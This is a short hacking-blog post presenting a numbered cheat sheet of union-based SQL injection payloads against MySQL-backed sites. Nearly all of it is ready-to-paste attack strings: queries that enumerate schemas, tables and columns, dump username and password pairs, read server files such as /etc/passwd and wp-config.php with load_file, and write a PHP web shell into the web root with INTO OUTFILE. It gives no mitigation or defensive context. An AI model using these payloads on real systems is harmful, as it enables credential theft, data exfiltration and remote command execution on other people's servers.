Skip to content

Pentestblog

Menu
  • Home
  • Kali Linux
  • Blog
  • CTF Challenges
  • Course
    • Download Free Videos
  • Contact Us

SQL INJECTION – Extracting Username and Password From Database

By Pentestblog 04/05/2022 SQL Injeciton 0 Comments


Hello! Pentesters, In this article, We will hunt How to extract Database Name, Table_Name, Column_Name, and even USERNAME and PASSWORD from a Database.

Some Basic SQL Command:

  • user()
  • version()
  • database()

1) Find Out User Information

  • union select user()
  • union select database()
  • union select version()

2) Find Out Database Name

  • union select group_concat(schema_name) from information_schema.schemata

3) Find Out Tables Name

  • union select group_concat(table_name) from information_schema.tables where table_schema=’#Database_Name’

4) Find Out Columns Name

  • union select group_concat(column_name) from information_schema.columns where table_name=’#Table_Name’

5) Extract Username And Password From Database

  • union select group_concat(username,’:’,password) from #table_name

6) Check All Privileges inside the Database

  • union select privilege_type FROM information_schema.user_privileges where grantee = “user()” #’uhc’@’localhost’

7) Read Arbitrary Operating System File inside the Database

  • union select load_file(‘/etc/passwd’)
  • union select load_file(‘/etc/os-release’)
  • union select load_file(‘/var/www/wordpress/wp-config.php’)
  • union select load_file(‘/etc/issue’)
  • union select load_file(‘/var/log/apache2/access.log’)
  • union select load_file(‘/etc/apache2/sites-available/000-default.conf’)
  • union select load_file(‘/etc/fstab’)

8) Create a Malicious PHP Shell Inside the Database

  • union select “<?php system($_REQUEST[pentestblog]);?>” into outfile ‘/var/www/html/shell.php’

⭐⭐⭐⭐⭐

Rating: 5 out of 5.
Trending
CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability


Recent Posts


  • CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
  • SQL INJECTION – Extracting Username and Password From Database
  • How To Dump Username And Password Using SQLMap Tool?
  • Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
  • Hack The Box Previse HTB CTF Machine Walkthrough

Most Popular Posts


  • CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
  • How To Dump Username And Password Using SQLMap Tool?
  • Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
  • Hack The Box Previse HTB CTF Machine Walkthrough

CTF Challenges for Beginners

Related

Add a Comment

Cancel reply

Your email address will not be published. Required fields are marked *

Recent Posts

  • CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
  • SQL INJECTION – Extracting Username and Password From Database
  • How To Dump Username And Password Using SQLMap Tool?
  • Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
  • Hack The Box Previse HTB CTF Machine Walkthrough

Recent Comments

  • Cysecon on Top 10 Computer Hacking Tools For Ethical Hacker
  • Cysecon on How Can I See List All Users In A MySQL Database Server
  • Cysecon on Download Our Best Hacking Videos Deleted by Youtube
  • Cysecon on Top 10 Computer Hacking Tools For Ethical Hacker
  • deutschland on What is Termux? How To Use Termux Basic Command As a Beginner?

Archives

  • June 2022
  • May 2022
  • January 2022
  • December 2021
  • November 2021
  • September 2021
  • August 2021
  • July 2021
  • June 2021
  • May 2021
  • April 2021
  • March 2021
  • February 2021

Please Share

0
1
0
0
0
0
0
0
0

Follow Us

Pentestblog Youtube

RSS Pentestblog

  • CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability

Categories

  • 0 Day CVE
  • 0-Day
  • Android Hacking
  • Apache Log4j
  • Blog
  • CTF Challange
  • CVE
  • Ethical Hacking
  • Gadgets
  • Hack the Box
  • Kali Linux
  • OSCP
  • Phishing
  • SQL Injeciton
  • SQL Injection
  • WordPress Hacking

Other Pages

  • Privacy Policy
  • DMCA
  • Terms and Conditions
  • About Us
  • Contact Us
  • Our Videos
  • Our Course
  • CTF Challenges
Pentestblog Copyright © 2022.
Created by Sandeep Yadav (Ethical Hacker) Back to Top ↑